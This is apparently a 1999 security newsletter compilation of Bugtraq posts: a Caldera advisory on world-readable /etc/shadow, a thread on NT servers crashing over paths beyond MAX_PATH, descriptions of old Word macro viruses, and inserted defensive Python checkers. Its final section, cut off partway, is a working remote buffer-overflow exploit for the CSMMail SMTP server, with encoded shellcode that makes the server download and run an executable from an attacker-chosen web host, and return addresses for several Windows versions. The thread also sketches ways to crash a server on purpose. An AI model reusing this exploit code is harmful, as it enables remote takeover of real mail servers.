       Date: Thu, 29 Apr 1999 13:53:05 -0700
       From: Paul Leach <paulle@MICROSOFT.COM>
       To: BUGTRAQ@netspace.org
       Subject: Security Configuration Editor info
       
       Since I said that SCE could be used to fix the ProfileList bug that Mnemonix
       reported, I got a private request asking where more information about SCE
       (Security Configuration Editor) could be found -- they'd tried the usual
       places.
       
       I think they changed the name since SP4 to "Security Configuration Manager",
        but I called it SCE because most people know it by the old name, since that's
       what it was called in SP4. I did a search on that exact phrase at
       www.microsoft.com and got a lot of hits, the first one was
       
        http://www.microsoft.com/NTServer/security/techdetails/prodarch/securconfig.asp
       
       which looks pretty good. In general, a good place to look for security info
       on MS products is
       
        http://www.microsoft.com/security/Resources/whitepapers.asp
       
       Paul
       
       
       @HWA       
       
 40.0  Microsoft is a virus, oh sorry I mean new microsoft virus problem...
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml
       
       microsoft.virus.txt - Microsoft yet again releases virus infected MS Word 
       documents on their own web site! If you have visited 
       http://www.microsoft.com/uk/business_technology/dns/ecommerce/financial/case.htm
       recently to find out more about MS Exchange and E-commerce, then you should scan 
       for the W97M/Marker.C virus on your network. This has happened numerous times, and
       Microsoft STILL cannot manage to check documents for
       viruses before releasing them on their web site. Thanks a fucking lot, Microsoft!      
       
       Date: Sun, 25 Apr 1999 13:13:34 +0100
        From: T Bruce Tober <octobersdad@reporters.net>
       Subject: You'd think they'd know better...
       
        ...or maybe not. I mean, it is Microcrap we're talking about here, viz this
        article from Woody's (Woody's Office Watch), and if there's anyone more
        pro-Microsoft it's only Bill G himself:
        (Read the complete story at http://www.wopr.com/ )
       
         TRUST NO ONE  [...]
         Microsoft has in the past released virus infected documents on their web
         site and by other means.  WOW has had to publish warnings several times.
         Sadly it's happened again.  Anyone visiting
       http://www.microsoft.com/uk/business_technology/dns/ecommerce/financial/case.htm
         to find out more about MS Exchange and E-commerce got more than they
         bargained for when they downloaded any of the case study documents.  All
         were infected with W97M/Marker.C virus!  Apparently no-one at Microsoft
         checked the documents before making them publicly available [...]
       
       Bruce Tober, <octobersdad@reporters.net>, <http://www.crecon.demon.co.uk>
       Birmingham, UK, EU +44-121-242-3832 soon at <http://www.star-dot-star.co.uk>
       
       
       RISKS-LIST: Risks-Forum Digest Weds 28 April 1999  Volume 20 : Issue 34
       
       @HWA

       
       
 41.0  Some new viruses from  http://www.wopr.com/ 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       DMV, Hot, FormatC, Wiederoffnen 

                                                                                     

       DMV
       
        DMV is probably the first Word macro virus to have been written. It is a test virus, written by a person called Joel McNamara
        to study the behavior of macro viruses. As such, it is no threat: it announces its presence in the system and keeps the user
        informed of its actions. 
       
       McNamara wrote DMV in the fall of 1994 - at the same time, he published a detailed study about macro viruses. He kept
       his test virus under wraps until a real macro virus, Concept, was discovered. At that time, he decided to make DMV known
       to the public. We can expect to see new variants of the DMV virus, as well as totally new viruses inspired by the techniques
       used in this virus. McNamara also published a skeleton for a virus to infect Microsoft Excel spreadsheet files. 
       
       Hot
       
       Hot was the first Word macro virus written in Russia. It was found in the wild over there in January 1996. 
       It spreads in a similar manner as the Concept virus: when an infected DOC is first opened, the virus modifies the
       NORMAL.DOT file, and will spread to other documents after that. Unlike the earlier Word macro viruses, Hot does not
       replicate with the File/Save As command - it infects only during the basic File/Save command. This means that Hot will infect
       only existing documents in the system - not new ones. 
       
       Infected documents contain the following four macros, which are visible in the macro list: 
       
       AutoOpen 
       DrawBringInFrOut 
       InsertPBreak 
       ToolsRepaginate 
       
       When Hot infects NORMAL.DOT, it renames these macros to: 
       
       StartOfDoc 
       AutoOpen 
       InsertPageBreak 
       FileSave 
       
       Macros are saved with the 'execute-only' feature, which means that a user can't view or edit them. 
       Hot contains a counter. It adds a line like this to the WINWORD6.INI file: 
       
       QLHot=35112 
       
        This number is based on the number of days in this century. Hot adds 14 to this number and then waits until this latency time
        of 14 days has passed. Hot will spread normally during this time; it will just not activate. 
        After the 14 day pause, there is a 1 in 7 chance that a document will be erased when it is opened. The virus will delete all
        text and re-save the document. Hot does not do this if it finds a file called EGA5.CPI in the C:\DOS directory. A
        comment in the source code of the virus hints that this feature was added so that the author of the virus and his friends can
        protect themselves from the activation damage: 
       
       '---------------------------------------------------------------
       '- Main danger section: if TodayNo=(QLHotDateNo + RndDateNo) ---
       '- and if File C:DOSega5.cpi not exist (not for OUR friends) -
       '--------------------------------------------------------------- 
       
       By default, there is no file by the name EGA5.CPI in MS-DOS distributions. 
       
       Hot was the first macro virus to use external functions. This system allows Word macros to call any standard Windows API
       call. The use of external functions specific to Windows 3.1x means that Hot will be unable to spread under Word for
       Macintosh or Word 7 for Windows 95: opening an infected document will just produce an error message. 
       
       FormatC
       
       This is not a virus, but a trojan because it does not replicate. It does, however, format your C: drive as soon as the document
       is opened. This trojan was posted to a Usenet newsgroup. 
       
       Wiederoffnen
       
       Wiederoffnen is not a virus, but a Word macro trojan. It comes in a Microsoft Word 2 document but works perfectly under
       Word 6 too. Wiederoffnen intercepts the AutoClose macro and when the document is closed plays tricks with
       AUTOEXEC.BAT. 
       
       
       @HWA
       
       
 42.0  Caldera COAS may leave shadowed password file readable...
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Date: Tue, 27 Apr 1999 20:26:16 -0600
       From: synapse <syn@TOXYGENE.MADSCIENCE.NU>
       To: BUGTRAQ@netspace.org
       Subject: Caldera Advisory
       
       Heya Aleph,
       
        Not sure if this had come across the list.
       
       
       -----BEGIN PGP SIGNED MESSAGE-----
       
       ______________________________________________________________________________
                          Caldera Systems, Inc.  Security Advisory
       
       Subject:                COAS
       Advisory number:        CSSA-1999:009.0
       Issue date:             1999 04 27
       Cross reference:
       ______________________________________________________________________________
       
       
       1. Problem Description
       
          /etc/shadow may get world readable
       
       
       2. Vulnerable Versions
       
          Systems:     OpenLinux 2.2.
          Packages:    previous to coas-1.0-8
       
       
       3. Solutions
       
       
          The proper solution is to upgrade to the coas-1.0-8 package.
          If /etc/shadow is world-readable, this is fixed with
       
               chmod 600 /etc/shadow
       
       
       4. Location of Fixed Packages
       
          The upgrade packages can be found on Caldera's FTP site at:
       
          ftp://ftp.calderasystems.com/pub/OpenLinux/updates/2.2/current/RPMS/
       
          The corresponding source code package can be found at:
       
           ftp://ftp.calderasystems.com/pub/OpenLinux/updates/2.2/current/SRPMS
       
       
       5. Installing Fixed Packages
       
          Upgrade the affected packages with the following commands:
       
          rpm -q coas && rpm -U coas-1.0-8.i386.rpm
       
       
       6. Verification
       
          The MD5 checksums (from the "md5sum" command) for these packages are:
       
          1efa8cde40f5684293e03c2499f2f59f  README
          b3fa473f6ba574052991bf2254bd378d  RPMS/coas-1.0-8.i386.rpm
          3bfa00aa3230f97537e8baa2c0454d08  SRPMS/coas-1.0-8.src.rpm
       
       
       7. References
       
          This and other Caldera security resources are located at:
       
          http://www.calderasystems.com/news/security/index.html
       
          Additional documentation on this problem can be found in:
       
       
          This security fix closes Caldera's internal Problem Report 4544.
       
       
       8. Disclaimer
       
          Caldera Systems, Inc. is not responsible for the misuse of any of the
          information we provide on this website and/or through our security
          advisories. Our advisories are a service to our customers intended to
          promote secure installation and use of Caldera OpenLinux.
       
       ______________________________________________________________________________
       
       
       -----BEGIN PGP SIGNATURE-----
       Version: 2.6.3i
       Charset: noconv
       
       iQCVAwUBNyW4/+n+9R4958LpAQHntgP/cHhIOaKUPRfeBOtMQP7lZ2NQlEPrqzkq
       cu/Q9IvIqrvm/mFikznaMTdehz0Jql2NuY2Zjs0MUdF0Rm7KsgBQ6BYX+10GAE2W
       HAZIuYQ2zeM2acGcrvzGYExkKmrLOfhD77V9l7rZ9WieQO7B8vmj5N4nGdkUNz2U
       j+AigG8FJNI=
       =O2I/
       -----END PGP SIGNATURE-----
       
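        The advisory's remedy is a permission check followed by chmod 600. As an added example (not part of Caldera's
        advisory or of the coas package), the Python below does that audit in a reusable form: report the permission bits
        of the shadow files, flag anything readable by group or others, optionally apply mode 0600, and demonstrate the
        whole cycle on a constructed temporary file rather than on the real /etc/shadow. The SENSITIVE_FILES list (shadow
        plus its gshadow sibling) and the demo() helper are this example's own.

```python
"""Detect shadow-type files that are readable by anyone but their owner and
restore mode 0600, the remedy the Caldera advisory gives for /etc/shadow.

Added example, not from the advisory. demo() exercises the check on a
throwaway temporary file so it runs safely on any machine.
"""
import os
import stat
import tempfile

# Files that must never be group- or world-readable (default audit set; assumption
# of this example, the advisory itself names only /etc/shadow).
SENSITIVE_FILES = ("/etc/shadow", "/etc/gshadow")
SAFE_MODE = 0o600


def mode_report(path: str) -> dict:
    """Permission bits of one file, decoded into the two questions the advisory raises."""
    st = os.stat(path)
    mode = stat.S_IMODE(st.st_mode)
    return {
        "path": path,
        "mode": mode,
        "world_readable": bool(mode & stat.S_IROTH),
        "group_readable": bool(mode & stat.S_IRGRP),
        "owner_uid": st.st_uid,
    }


def needs_fix(report: dict) -> bool:
    """True if anyone besides the owner can read the file."""
    return report["world_readable"] or report["group_readable"]


def fix_mode(path: str) -> int:
    """Apply the advisory's remedy (chmod 600) and return the resulting mode."""
    os.chmod(path, SAFE_MODE)
    return stat.S_IMODE(os.stat(path).st_mode)


def audit(paths=SENSITIVE_FILES, repair: bool = False) -> list:
    """Return a report for every listed file that exists and is too readable.
    With repair=True each finding also records the mode after chmod 600."""
    findings = []
    for path in paths:
        if not os.path.exists(path):
            continue
        report = mode_report(path)
        if needs_fix(report):
            report["fixed_mode"] = fix_mode(path) if repair else None
            findings.append(report)
    return findings


def demo() -> tuple:
    """Reproduce the advisory's condition on a constructed file: make it
    world-readable (0644), audit, repair, audit again.
    Returns (was_world_readable, mode_after_fix, findings_after_fix)."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        os.chmod(path, 0o644)
        before = audit([path])
        repaired = audit([path], repair=True)
        after = audit([path])
        return (len(before) == 1 and before[0]["world_readable"],
                repaired[0]["fixed_mode"],
                after)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print("constructed-file demo:", demo())
    for finding in audit():          # real shadow files, report only
        print(f"{finding['path']}: mode {finding['mode']:04o} is readable by others")
```

        The second loop only reports; pass repair=True to audit() to apply chmod 600 to the real files, which needs root.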
       
       @HWA
 
 43.0  NT4+SP4 filename length vulnerabilty
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Bug in WinNT 4.0 SP4

       Alvaro Gilabert (agilabert@RIBA.ES)
       Mon, 19 Apr 1999 15:15:36 +-200 
       
       Hi,
        I suppose it is a bug and I will explain why I think so.
        You can exceed the limit in the number of chars allowed in a filename. 
        WinNT does allow it. You can move a folder to a deeper one exceeding it.
        But, when you try to backup that folder, the backup program (BackupExec 
        and WinNT Backup) crashes and reboots the server. If you try to backup 
        through a network drive (using another server and mapping that folder), then 
        it crashes and reboots the server also. Not the server that is making the 
        backup but the server that has the wrong folder. That's a bug because WinNT, 
        supposed to be a fileserver, should take care of this. Recently, Mindspring 
        released a report comparing WinNT vs. RedHat, sponsored by Microsoft. This 
        point was missed in the comparison.
       
       Alvaro Gilabert
       ICQ UIN 2316344
       
       -----------------------------------------------------------------
       
       Re: Bug in WinNT 4.0 SP4
       
       David LeBlanc (dleblanc@MINDSPRING.COM)
       Tue, 20 Apr 1999 07:12:23 -0700 
       
       At 03:15 PM 4/19/99 +-200, Alvaro Gilabert wrote:
       >Hi,
        >I suppose it is a bug and I will explain why I think so.
        >You can exceed the limit in the number of chars allowed in a filename.
        >WinNT does allow it. You can move a folder to a deeper one exceeding it.
       
       That's because the limit isn't where you think it is.  From the
       documentation on CreateFile in the SDK:
       
        Windows NT: You can use paths longer than MAX_PATH characters by calling
        the wide (W) version of CreateFile and prepending "\\?\" to the path. The
        "\\?\" tells the function to turn off path parsing. This lets you use paths
        that are nearly 32,000 Unicode characters long. You must use
        fully-qualified paths with this technique. This also works with UNC names.
        The "\\?\" is ignored as part of the path. For example,
        "\\?\C:\myworld\private" is seen as "C:\myworld\private", and
        "\\?\UNC\tom_1\hotstuff\coolapps" is seen as "\\tom_1\hotstuff\coolapps".
       ===============================
       
       So it seems that if you use the APIs properly, you can deal with extremely
       long paths.  When you move things around, it is very likely that you are
       dealing with relative names, not absolute names.
       
       
       David LeBlanc
       dleblanc@mindspring.com
       
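        The documentation David quotes describes a fixed rewriting rule, which the Python below implements as an added
        example (not code from the thread or from the SDK): to_extended() turns a fully-qualified drive or UNC path into
        its \\?\ form, from_extended() reverses it exactly as the quoted text says the prefix is "seen", and
        needs_extended() tells a tool such as a backup program whether a path is past MAX_PATH and so must go through the
        prefixed form. MAX_PATH = 260 and the 32,767-character extended limit are the Win32 values; the sample paths are
        the ones in the quoted documentation, and the deep folder chain in the test is constructed.

```python
r"""Convert between ordinary Win32 paths and the extended-length \\?\ form.

Added example following the CreateFile documentation quoted above; not
code from the thread. Pure string handling, so it runs on any platform.
"""
MAX_PATH = 260          # Win32 limit for the ordinary (parsed) path form, NUL included
EXTENDED_LIMIT = 32767  # the "nearly 32,000" Unicode characters the documentation mentions
PREFIX = "\\\\?\\"          # \\?\
UNC_PREFIX = "\\\\?\\UNC\\"  # \\?\UNC\


def is_fully_qualified(path: str) -> bool:
    """Drive-absolute (C:\...) or UNC (\\server\share\...) paths only; the
    documentation says the prefix technique requires fully-qualified paths."""
    if path.startswith("\\\\"):
        return True
    return len(path) >= 3 and path[0].isalpha() and path[1] == ":" and path[2] == "\\"


def to_extended(path: str) -> str:
    r"""Return the \\?\ form: C:\x -> \\?\C:\x and \\srv\share\x -> \\?\UNC\srv\share\x."""
    if path.startswith(PREFIX):
        return path
    if not is_fully_qualified(path):
        raise ValueError(f"not a fully-qualified path: {path!r}")
    if path.startswith("\\\\"):
        return UNC_PREFIX + path[2:]
    return PREFIX + path


def from_extended(path: str) -> str:
    r"""Strip the prefix, giving the path as the documentation says it is 'seen'."""
    if path.startswith(UNC_PREFIX):
        return "\\\\" + path[len(UNC_PREFIX):]
    if path.startswith(PREFIX):
        return path[len(PREFIX):]
    return path


def needs_extended(path: str) -> bool:
    """True when the parsed form would not fit in MAX_PATH (terminating NUL included)."""
    return len(from_extended(path)) + 1 > MAX_PATH


def within_extended_limit(path: str) -> bool:
    """True when even the prefixed form is within what the W APIs accept."""
    return len(to_extended(path)) + 1 <= EXTENDED_LIMIT


if __name__ == "__main__":
    for sample in ("C:\\myworld\\private", "\\\\tom_1\\hotstuff\\coolapps"):
        ext = to_extended(sample)
        print(f"{sample} -> {ext} -> {from_extended(ext)}  needs_extended={needs_extended(sample)}")
    deep = "C:\\" + "\\".join(["folder"] * 50)   # constructed: 50 nested folders
    print(f"{len(deep)} chars: needs_extended={needs_extended(deep)}")
```

        A backup or file-walking tool that always opens files through to_extended() of an absolute path avoids the
        MAX_PATH failure the thread describes; the relative names David mentions fail is_fully_qualified() and are
        rejected rather than silently prefixed.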
       -----------------------------------------------------------------
       
       Re: Bug in WinNT 4.0 SP4
       
       Paul Gracy (paul.gracy@COMPGEN.COM)
       Mon, 26 Apr 1999 16:36:11 -0400 
       
       I must disagree.  Any action that a program takes that can crash a server is
       a bug.  Period.
       
       The fact that properly using the SDK and following all the 'rules of
       microsoft' would prevent the crash is not an excuse.  When the application
       tries to do something that would cause a crash, the OS should whack the
       offender's knuckles (see Dr. Watson), not curl up and die.
       
       I am tired of bad code being given excuses.  If MS wants to run large,
       mission-critical / business-critical systems, they should fix their code.
       
       IMHO.
       
       =========================
       Paul H. Gracy
       paul.gracy@compgen.com
       phone: 404 705 2873
       #include <std.disclaimer>
       =========================
       
       
       > -----Original Message-----
       > From: David LeBlanc [SMTP:dleblanc@MINDSPRING.COM]
       > Sent: Tuesday, April 20, 1999 10:12 AM
       > To:   BUGTRAQ@netspace.org
       > Subject:      Re: Bug in WinNT 4.0 SP4
       >
       > At 03:15 PM 4/19/99 +-200, Alvaro Gilabert wrote:
       > >Hi,
       > >I supose it is a bug and I will explain why do I think so
       > >You can exceed the limit in the number of chars allowed in a filename.
       > WinNT does allow it. You can move a folder to a deeper one exceeding it.
       >
       > That's because the limit isn't where you think it is.  From the
       > documentation on CreateFile in the SDK:
       >
       > Windows NT: You can use paths longer than MAX_PATH characters by calling
       > the wide (W) version of CreateFile and prepending "\\?\" to the path. The
       > "\\?\" tells the function to turn off path parsing. This lets you use
       > paths
       > that are nearly 32,000 Unicode characters long. You must use
       > fully-qualified paths with this technique. This also works with UNC names.
       > The "\\?\" is ignored as part of the path. For example,
       > "\\?\C:\myworld\private" is seen as "C:\myworld\private", and
       > "\\?\UNC\tom_1\hotstuff\coolapps" is seen as "\\tom_1\hotstuff\coolapps".
       > ===============================
       >
       > So it seems that if you use the APIs properly, you can deal with extremely
       > long paths.  When you move things around, it is very likely that you are
       > dealing with relative names, not absolute names.
       >
       >
       > David LeBlanc
       > dleblanc@mindspring.com
       
       -----------------------------------------------------------------
       
       Re: Bug in WinNT 4.0 SP4
       
       David LeBlanc (dleblanc@MINDSPRING.COM)
       Tue, 27 Apr 1999 13:13:54 -0700 
       
       At 04:36 PM 4/26/99 -0400, Paul Gracy wrote:
       >I must disagree.  Any action that a program takes that can crash a server is
       >a bug.  Period.
       
       I did not say it wasn't a bug.  A bug, by definition, is something that
       causes an application (or even the whole OS) to crash or otherwise
       malfunction.  So you are not disagreeing with anything I _said_.  If you
       can make something go splat, then it is a bug.  No arguments there.
       
       >The fact that properly using the SDK and following all the 'rules of
       >microsoft' would prevent the crash is not an excuse.
       
       No excuses were being made.  Please do not manufacture excuses when they
       are not present.
       
       The only point was that Alvaro seemed to think that it was a problem that
       moving a folder could result in a total path which is > MAX_PATH.  So far
       as I know, this isn't a problem, since if you are correctly handling the
       open, you can deal with extremely long paths.  I thought that others might
       have the same sort of issue, and also thought that few people would know
       that bit of arcane trivia, so I was trying to point out how you might deal
       with this correctly.  In general, using API calls correctly, and knowing
       various bits of trivia from the documentation is a Good Thing, and perhaps
       might save others from having their app go down.
       
       I was NOT saying that crashing is not a bug.  That would be ridiculous.
       Neither the little backup app that comes with NT, or the Seagate product
       (which as far as I know, both sprung from Arcada, which Seagate bought) are
       favorites of mine.  And before anyone asks, I really don't have something I
       can recommend.
       
       
       David LeBlanc
       dleblanc@mindspring.com
       
       -----------------------------------------------------------------
       
       Date: Tue, 27 Apr 1999 21:03:52 +0200
       From: tschweikle@FIDUCIA.DE
       To: BUGTRAQ@netspace.org
       Subject: Antwort: Re: Bug in WinNT 4.0 SP4
       
        David LeBlanc wrote:
       >At 03:15 PM 4/19/99 +-200, Alvaro Gilabert wrote:
       >>Hi,
       >>I supose it is a bug and I will explain why do I think so
       >>You can exceed the limit in the number of chars allowed in a filename.
       >WinNT does allow it. You can move a folder to a deeper one exceeding it.
       >
       >That's because the limit isn't where you think it is.  From the
       >documentation on CreateFile in the SDK:
       >
       >Windows NT: You can use paths longer than MAX_PATH characters by calling
        >the wide (W) version of CreateFile and prepending "\\?\" to the path. The
        >"\\?\" tells the function to turn off path parsing. This lets you use paths
        >that are nearly 32,000 Unicode characters long. You must use
        >fully-qualified paths with this technique. This also works with UNC names.
        >The "\\?\" is ignored as part of the path. For example,
        >"\\?\C:\myworld\private" is seen as "C:\myworld\private", and
        >"\\?\UNC\tom_1\hotstuff\coolapps" is seen as "\\tom_1\hotstuff\coolapps".
       >===============================
       >
       >So it seems that if you use the APIs properly, you can deal with extremely
       >long paths.  When you move things around, it is very likely that you are
       >dealing with relative names, not absolute names.
       >
       >
       >David LeBlanc
       >dleblanc@mindspring.com
       
       
       
        While following this thread I tried it out. A few seconds later my NT server
        rebooted.
        
        Trying to create a 'reboot-server-path' from a client - impossible. It seems
        such a path must be created from the server console. But what about a carefully
        designed program, installable on the server, using the wide variant to create
        directories - creating paths exceeding MAX_PATH, then setting a share to such a
        program?
        
        WinNT crashes in this scenario every time a client wants to access this
        share.
        One simpler scenario: install a service. Exceed MAX_PATH. Start this service at
        system startup - watch the server rebooting.
       
       THIS IS A BUG - No excuse.
       
       ---
       Thomas Schweikle <tschweikle@fiducia.de>
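        The rule the thread keeps coming back to is the one quoted from the SDK: an
        ordinary path is limited to MAX_PATH, and anything longer is only reachable
        through CreateFileW with the "\\?\" prefix on a fully qualified path. The
        following is an added example, not code from the thread or from Microsoft: a
        pure-string checker that strips the prefix the way the SDK text describes and
        reports which paths a server operator should worry about (beyond MAX_PATH and
        therefore unreachable for ordinary clients, or prefixed but not fully
        qualified). MAX_PATH = 260 is the documented Win32 constant; the treatment of
        "." and ".." components and all sample paths are assumptions for this example.

```python
from dataclasses import dataclass, field
from typing import List, Tuple

MAX_PATH = 260                       # documented Win32 limit, counts the terminating NUL
NT_LIMIT = 32000                     # "nearly 32,000 Unicode characters" with the \\?\ form
LONG_PREFIX = "\\\\?\\"              # the literal \\?\
UNC_PREFIX = LONG_PREFIX + "UNC\\"   # the literal \\?\UNC\


@dataclass
class PathReport:
    seen_as: str            # the path as the file system sees it, prefix removed
    length: int             # characters in seen_as, excluding the NUL
    prefixed: bool          # caller used the \\?\ form
    fully_qualified: bool
    needs_long_api: bool    # cannot be opened through the MAX_PATH-limited code path
    problems: List[str] = field(default_factory=list)


def strip_prefix(path: str) -> Tuple[str, bool]:
    """Drop the \\?\ prefix exactly as the quoted SDK text describes."""
    if path.startswith(UNC_PREFIX):
        return "\\\\" + path[len(UNC_PREFIX):], True
    if path.startswith(LONG_PREFIX):
        return path[len(LONG_PREFIX):], True
    return path, False


def is_fully_qualified(path: str) -> bool:
    """Drive-absolute (C:\\dir) or UNC (\\\\host\\share) with no . or .. parts.

    Assumption for this example: because the prefix turns path parsing off,
    "." and ".." would not be normalised, so they are treated as not qualified.
    """
    parts = path.split("\\")
    drive = len(path) >= 3 and path[0].isalpha() and path[1] == ":" and path[2] == "\\"
    unc = path.startswith("\\\\") and len(parts) >= 4 and bool(parts[2]) and bool(parts[3])
    return (drive or unc) and "." not in parts and ".." not in parts


def check_path(path: str) -> PathReport:
    """Classify one path and list what would go wrong when it is opened."""
    seen_as, prefixed = strip_prefix(path)
    fq = is_fully_qualified(seen_as)
    length = len(seen_as)
    needs_long = length + 1 > MAX_PATH        # +1 for the NUL that MAX_PATH counts
    problems = []
    if needs_long and not prefixed:
        problems.append("longer than MAX_PATH: needs CreateFileW and the \\\\?\\ prefix")
    if prefixed and not fq:
        problems.append("\\\\?\\ prefix used with a path that is not fully qualified")
    if length + 1 > NT_LIMIT:
        problems.append("longer than the ~32,000 character NT limit")
    return PathReport(seen_as, length, prefixed, fq, needs_long, problems)


def audit(paths: List[str]) -> List[PathReport]:
    """Return a report for every path that has at least one problem.

    Intended use: walk a share or service directory on the server and list the
    entries that ordinary MAX_PATH clients cannot open safely.
    """
    return [r for r in map(check_path, paths) if r.problems]
```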
       
       
       @HWA       
       
 44.0  CSMMail Windows SMTP Server Remote Buffer Overflow Exploit
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Date: Tue, 27 Apr 1999 13:44:51 -0400
       From: pw <pw@NACS.NET>
       To: BUGTRAQ@netspace.org
       Subject: CSMMail Windows SMTP Server Remote Buffer Overflow Exploit
       
                CSMMail is an SMTP server for win95/98/NT with features that
        include at least five stack overflows.  At least two of these allow remote
        execution of arbitrary code.
                The first overflow is found in the HELO command; there is also
        an overflow in the MAIL FROM: command, however, I have been unable to get
        either of these to return to an arbitrary address.
                The next overflow I found was in the VRFY command: when a long string is
        used as an argument ("VRFY aaaaaaa....") one can overwrite the return
        address and force the server to return to arbitrary code. This is the
        overflow the following exploit takes advantage of.
                There is also another buffer overflow in the VRFY command which
        happens if one enters "VRFY aaaa@aaaaaaa......".  I have not been able to
        make this return to an arbitrary address.
                The RCPT TO: command also has an overflow in it that can be used to
        return to arbitrary code.
                There are two main problems which are run into when exploiting the
        first hole in the VRFY command.  The first one is trivial to get around.
        If an "@" sign (40h) is found in the buffer being copied and the buffer is
        excessively long, it will not overflow the buffer.  To get around this we
        just make sure 40h is not in our code or offset addresses.
                The next problem stems from the fact that CSM Mail has no DLLs of
        its own which are loaded in its address space and its Image Base is
        00400000h.  Since we will have to include a null to address any of
        CSMMail's code there is no sure way to return to our code.  To get around
        this I have included multiple return addresses in the exploit which are
        bound directly to the operating system version which CSM Mail is running
        under.
                It is also worth noting that two of the arguments for
        the function which is having its return address overwritten need to be
        fixed up with a valid readable memory location in order to bypass page faults.
                The exploit that is included below will force CSMMail to connect
        to a specified web server and download, save and execute a file from it.
        The exploit should work under x86 Unixes and x86 versions of win32.  By
        default it is set to be compiled under unix; to compile it under win32
        take out the "#define UNIX".  I would like to thank Acpizer for
        porting this to win32 and determining the SP3 address values.
                I do not know of any bugfixes for this and this exploit
        works on the current version which is being distributed from their
        site.  (It did the last time I checked it)
       
       -mcp
       
       <--------------------------CUT HERE------------------------->
       
       #define UNIX
       
        #ifndef UNIX
         #include <stdio.h>
         #include <stdlib.h>     /* exit() */
         #include <string.h>     /* strcpy(), strstr(), memcpy(), memset() */
         #include <fcntl.h>
         #include <winsock.h>
         #include <io.h>
         #define CLOSE _close
         #define SLEEP Sleep
        
        #else
         #include <stdio.h>
         #include <stdlib.h>     /* exit() */
         #include <string.h>     /* strcpy(), strstr(), memcpy(), memset() */
         #include <strings.h>    /* bcopy() */
         #include <unistd.h>
         #include <fcntl.h>
         #include <netdb.h>
         #include <netinet/in.h>
         #include <sys/socket.h>
         #include <arpa/inet.h>
         #define CLOSE close
         #define SLEEP sleep
        #endif
       
       /*
        CSMMail Exploit by _mcp_ <pw@nacs.net>
        Win32 port and sp3 address's by Acpizer <acpizer@unseen.org>
       
        Greets go out to the following people: Morpheus, Sizban, Rocket,
          Acpizer, Killspree, Ftz, Dregvant, Vio, Symbiont, Coolg, Henk, #finite
          and #win32asm.
       
        You can contact me by e-mail or on efnet.
       
       
        As always no greets go out to etl
       
       */
       
       
       const unsigned long FIXUP1 = 264;
       const unsigned long FIXUP2 = 268;
       const unsigned long OFFSET = 260;
       
       char code[] =
       "\xEB\x53\xEB\x20\x5B\xFC\x33\xC9\xB1\x82\x8B\xF3\x80\x2B\x1"
       "\x43\xE2\xFA\x8B\xFB\xE8\xE9\xFF\xFF\xFF\xE8\xE4\xFF\xFF\xFF"
       "\xEB\x37\x46\x58\xFF\xE0\x33\xDB\xB3\x48\xC1\xE3\x10\x66\xBB"
       "\x94\x62\x56\xFF\x13\x8B\xE8\x46\x33\xC0\x3A\x6\x75\xF9\x46"
       "\x83\xC0\x1\x3A\x6\x74\xDD\x56\x55\x33\xDB\xB3\x48\xC1\xE3"
       "\x10\x66\xBB\xB8\x62\xFF\x13\xAB\xEB\xDF\xEB\x4F\x33\xC9\x66"
       "\x49\xC1\xC1\x2\x51\x33\xC0\x51\x50\xFF\x57\xE8\x8B\xE8\x33"
       "\xC9\x51\x51\x51\x51\x57\xFF\x57\xF4\x33\xC9\x51\x51\x51\x51"
       "\x56\x50\xFF\x57\xF8\x59\x57\x51\x55\x50\xFF\x57\xFC\x83\xC6"
       "\x7\x33\xC9\x51\x56\xFF\x57\xDC\xFF\x37\x55\x50\x8B\xE8\xFF"
       "\x57\xE0\x55\xFF\x57\xE4\x33\xC9\x51\x56\xFF\x57\xEC\xFF\x57"
       "\xF0\xE8\x59\xFF\xFF\xFF\x4C\x46\x53\x4F\x46\x4D\x34\x33\x1"
       "\x60\x6D\x64\x73\x66\x62\x75\x1\x60\x6D\x78\x73\x6A\x75\x66"
       "\x1\x60\x6D\x64\x6D\x70\x74\x66\x1\x48\x6D\x70\x63\x62\x6D"
       "\x42\x6D\x6D\x70\x64\x1\x58\x6A\x6F\x46\x79\x66\x64\x1\x46"
       "\x79\x6A\x75\x51\x73\x70\x64\x66\x74\x74\x1\x2\x58\x4A\x4F"
       "\x4A\x4F\x46\x55\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71"
       "\x66\x6F\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71\x66"
       "\x6F\x56\x73\x6D\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x53"
       "\x66\x62\x65\x47\x6A\x6D\x66\x1\x2\x69\x75\x75\x71\x3B\x30"
       "\x30\x00";
       
       
           /*This is the encrypted /~pw/owned.exe we paste at the end */
       char dir[] =
       "\x30\x7f\x71\x78\x30\x70\x78\x6f\x66\x65\x2F\x66\x79\x66\x1\x0";
       
       
       unsigned int getip(char *hostname)
         {
         struct hostent *hostinfo;
         unsigned int binip;
       
         hostinfo = gethostbyname(hostname);
       
         if(!hostinfo)
           {
             printf("cant find: %s\n",hostname);
             exit(0);
           }
       #ifndef UNIX
         memcpy((char  *)&binip, hostinfo -> h_addr, hostinfo -> h_length);
       #else
         bcopy(hostinfo -> h_addr, (char  *)&binip, hostinfo -> h_length);
       #endif
         return(binip);
         }
       
       
       int usages(char *fname)
       {                                               
             printf("CSMMail Remote Buffer Overflow exploit v1.1 by _mcp_ <pw@nacs.net>.\n");
             printf("Win32 porting and nt sp3 address's by Acpizer <acpizer@unseen.org>\n");
             printf("Usages: \n");
             printf("%s <target host> <www site> <fixup address> <return address>\n", fname);
             printf("win98 SP1:\n");
             printf("        <fixup address>  = 0xBFF78030\n");
             printf("        <return address> = 0xBFF79243\n");
             printf("NT SP3:\n");
             printf("        <fixup address>  = 0x77EB14C0\n");
             printf("        <return address> = 0x77E53FC7\n");
             printf("NT SP4:\n");
             printf("        <fixup address>  = 0x77EB14C0\n");
